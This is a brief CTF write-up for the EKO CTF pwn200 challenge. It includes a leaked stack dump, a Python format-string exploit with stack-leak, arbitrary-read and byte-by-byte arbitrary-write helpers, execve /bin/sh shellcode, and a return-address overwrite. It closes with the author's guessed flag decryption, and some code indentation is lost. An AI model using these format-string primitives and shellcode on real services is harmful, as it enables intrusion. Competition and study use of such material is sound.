
EKO CTF pwn200

daehee87 2015. 9. 17. 23:10


this is not pwn task :(

binary getting with fsb seems incorrect.

just guessed the algorithm and got flag.

I can see stack. there is no ASLR....

root@ubuntu:~/tmp/eko# python 

<Simple loop greetings v1.3.3.7>

[!] Type bye to quit

Enter your name: 

stage1 start!

0xbffff754:(1th) -> 13370a97

0xbffff758:(2th) -> c

0xbffff75c:(3th) -> 1337070e

0xbffff760:(4th) -> 10

0xbffff764:(5th) -> 13370326

0xbffff768:(6th) -> 0

0xbffff76c:(7th) -> 25000000

0xbffff770:(8th) -> a782438

0xbffff774:(9th) -> 0

0xbffff778:(10th) -> 0

0xbffff77c:(11th) -> bcc80900

0xbffff780:(12th) -> 0

0xbffff784:(13th) -> b7fd1000

0xbffff788:(14th) -> bffff7a8

0xbffff78c:(15th) -> 13370985

0xbffff790:(16th) -> 13372080

0xbffff794:(17th) -> 13370ae3

0xbffff798:(18th) -> 133709ab

0xbffff79c:(19th) -> b7fd1000

0xbffff7a0:(20th) -> 133709a0

0xbffff7a4:(21th) -> 0

0xbffff7a8:(22th) -> 0

0xbffff7ac:(23th) -> b7e43a63

0xbffff7b0:(24th) -> 1

0xbffff7b4:(25th) -> bffff844

0xbffff7b8:(26th) -> bffff84c

first, grab binary from ELF base 0x13370000

then I can see all the logics.

but the flag generation logic seems wrong... (XOR 4 byte)

so, I control EIP and jump to flag printing part. but nothing :(

from socket import *

import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib

shell = "\x31\xD2\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\x31\xC0\xB0\x0B\xCD\x80"

shell = "\xeb\xfe"

# common stuffs

p  = lambda x: struct.pack("<L", x)

pq = lambda x: struct.pack("<Q", x)

ph = lambda x: struct.pack("<H", x)

pb = lambda x: struct.pack("<B", x)

def recv_until(s, pat):

msg = ''

while True:

msg += s.recv(1024)

if msg.find(pat) != -1:


return msg

def check_stack(s):

recv_until(s, 'name: ')

print '== stack dump =='

for i in xrange(1, 120):

       payload = '%{0}$x'.format(i)

       s.send(payload + '\n')

       r = s.recv(1024).split('Hi ')[1].split('\n')[0]

       print '{0}:({1}th) -> {2}'.format(hex(0xbffff750+4*i), i, r)

# lsb : 0~3, byte : 0~255

def make_pointer(s, lsb, byte):

recv_until(s, 'name: ')

payload = '%{0}c%26$hhn'.format(16+lsb)

s.send(payload + '\n') # 0xbffff910 at $63

recv_until(s, 'name: ')

payload = '%{0}c%63$hhn'.format(byte)

s.send(payload + '\n') # write lsb1 at $112

# overwrite a byte to pointer. MSB first!

def write_byte_to_pointer(s, byte):

recv_until(s, 'name: ')

payload = '%{0}c%112$n'.format(byte)

s.send(payload + '\n')

# LSB first.

def write_byte_where(s, addr, byte):

make_pointer(s, 3, ((addr&0xff000000) >> 24))

make_pointer(s, 2, ((addr&0x00ff0000) >> 16))

make_pointer(s, 1, ((addr&0x0000ff00) >> 8))

make_pointer(s, 0, ((addr&0x000000ff) >> 0))

write_byte_to_pointer(s, byte)

# write data into memory

def mem_write(s, addr, data):


for d in data:

print 'writing a byte {0}'.format(hex(ord(d)))

write_byte_where(s, addr + i, d)

i += 1

def mem_read(s, addr):

bin = ''

recv_until(s, 'name: ')

        payload = 'A' + p(addr) + 'FG%8$s'

        s.send(payload + '\n')

        result = s.recv(8192)

        result = result.split('FG')[1].split('Enter')[0]

        result = result.replace('\n\n', '\x00')

        bin += result.encode('hex')

        return '{0}: {1}'.format(hex(addr), bin)

# pwn

s = socket(AF_INET, SOCK_STREAM)

s.connect( ('',  20002) )

# ret at 0xbffff78c

# $112 -> 0xbffff910 (target pointer location)

# argv at $26(0xbffff84c) points to $63(0xbffff96e)

# : 0x1337201c (0xb7e8ce30)

# : 0x13372010

# overwrite at $112 (0x133708cc)

print mem_read(s, 0x13373008)


print 'injecting shellcode at 0xbffff110...'

mem_write(s, 0xbffff310, shell)

print 'overwriting ret address...'

mem_write(s, 0xbffff78c, p(0xbffff110))


# return.

print 'return!'

recv_until(s, 'name: ')



t = telnetlib.Telnet()

t.sock = s


tried to get shell, but before doing that,

I just ignored the logic (xor until 4byte) and change the logic and got flag...

this is stupid task... :(

dumping 0x13372080


dumping 0x13370ae3



dumping 0x133720c1

7173271f1d4847 00


dumping 0x133720cc (encrypted flag)





key (not real one, I just guessed to be like this by ignoring 4byte limit)



decrypt this(560c0a1d67084218575c534f1a047221183a310549262c18091e1a705c6b00) with key(34376661343634613363303039353166373833646433353037313336633239336237623531) then I get flag. I don't know why :(
